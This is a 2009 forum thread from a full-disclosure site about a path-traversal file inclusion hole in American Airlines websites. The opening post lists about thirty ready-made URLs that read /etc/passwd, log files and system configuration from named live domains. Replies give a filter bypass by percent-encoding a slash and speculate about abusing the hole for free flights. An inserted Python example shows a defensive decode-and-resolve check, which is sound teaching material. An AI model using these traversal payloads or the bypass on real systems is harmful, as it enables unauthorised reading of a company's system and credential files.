Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
american airlines local file inclusion
Posted by: RonPaul
Date: May 18, 2009 06:00PM

http://www.aa.com.do/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.aa.com.pe/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.be/aa/i18nForward.do?locale=en_GB&p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ch/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.cn/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.cr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.co.uk/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.de/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.fr/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.ie/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.in/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.it/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.americanairlines.jp/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.american-airlines.nl/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.aa.com.ve/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.au/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../etc/passwd
https://www.americanairlines.com.ru/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../etc/passwd
http://www.flagshiplounge.net/aa/i18nForward.do?locale=en_GB&p=
http://www.premiumcustomerservices.net/aa/i18nForward.do?locale=en_GB&p=
http://www.touraa.com/aa/i18nForward.do?p=

and some sensitive files I found

https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/wtmpx
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/logadm.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/messages
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/lib/newsyslog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../usr/sbin/logadm
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../var/adm/lastlog
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/netconfig
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/syslog.conf
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/system
https://www.aa.com/aa/i18nForward.do?p=../../../../../../../../../../../../../../../../../../../../../../../../etc/hosts
It's been reported and they don't feel like responding.
Edited 1 time(s). Last edit at 07/16/2009 06:11AM by RonPaul.

Re: american airlines local file inclusion
Posted by: mort
Date: May 23, 2009 08:36PM

So it's fixed for literal "." in the URL, returns a 403 that says "no .. allowed in URL".

Happily takes hex still, just sub the very first "/" for "%2f" and leave the rest.

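The thread shows two things a defender should take from this: the original post's `p=` parameter was joined straight to a filesystem path, and the later fix (per mort's observation) inspected the raw query string, so encoding a single slash got past it. The following is an added example, not code from the thread or from the site it discusses, that puts a raw-string filter beside a decode-then-resolve check. `naive_is_safe` is a guess at the kind of check mort's report implies (the site's actual code is not on the page), and `SAMPLES`, `DEFAULT_BASE` and every other name here are constructed for the demonstration.

```python
"""Raw-string traversal filter vs. decode-and-resolve check.

Added example; the names, sample values and base directory below are
constructed for illustration and are not taken from the thread.
"""
from pathlib import Path
from urllib.parse import unquote
import tempfile

# Hypothetical web root the p= parameter is supposed to stay inside.
DEFAULT_BASE = Path(tempfile.gettempdir()) / "example-webroot"

# Constructed parameter values. "first_slash" is the shape mort describes:
# only the first "/" of the traversal is percent-encoded.
SAMPLES = {
    "legit":       "pages/home.jsp",
    "literal":     "../../../../etc/passwd",
    "first_slash": "..%2f../../../etc/passwd",
    "all_encoded": "%2e%2e%2f%2e%2e%2fetc%2fpasswd",
    "double":      "%252e%252e%252fetc%252fpasswd",
    "absolute":    "/etc/passwd",
    "nul":         "pages/home.jsp%00.txt",
}


def naive_is_safe(raw_param: str) -> bool:
    """Guessed raw-string filter: rejects only a leading literal '../'.

    It runs before percent-decoding, which is the flaw this example shows.
    """
    return not raw_param.startswith("../")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until the value stops changing; refuse deep nesting."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return decoded
        value = decoded
    raise ValueError("too many percent-encoding layers")


def safe_resolve(raw_param: str, base_dir: Path = DEFAULT_BASE):
    """Return the resolved path if it stays under base_dir, else None.

    Decodes first, rejects NUL bytes, then resolves the joined path and
    checks containment. An absolute right-hand side wins a pathlib join,
    so "/etc/passwd" resolves outside base_dir and is rejected too.
    """
    try:
        decoded = fully_decode(raw_param)
    except ValueError:
        return None
    if "\x00" in decoded:
        return None
    base = base_dir.resolve()
    candidate = (base / decoded).resolve()
    if candidate != base and base not in candidate.parents:
        return None
    return candidate


def compare(base_dir: Path = DEFAULT_BASE) -> dict:
    """Run both checks over SAMPLES; returns {name: (naive_ok, safe_ok)}."""
    return {
        name: (naive_is_safe(p), safe_resolve(p, base_dir) is not None)
        for name, p in SAMPLES.items()
    }


if __name__ == "__main__":
    for name, (naive_ok, safe_ok) in compare().items():
        print(f"{name:12} naive={'allow' if naive_ok else 'block':5} "
              f"resolve={'allow' if safe_ok else 'block'}")
```

Only the `legit` sample passes the resolve-based check; the naive filter lets through every encoded variant plus the absolute path and the NUL-byte name. The point is not the exact filter string but the order of operations: decode fully, then canonicalise, then compare against an allowlisted root.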
Re: american airlines local file inclusion
Posted by: PaPPy
Date: May 23, 2009 09:26PM

sometimes just taking off a ../ does it too

I wonder how long people have been abusing this, maybe getting free flights?

anyone find anything good?

http://www.xssed.com/archive/author=PaPPy/

Re: american airlines local file inclusion
Posted by: RonPaul
Date: September 11, 2009 07:21AM

what a shock, still not fixed
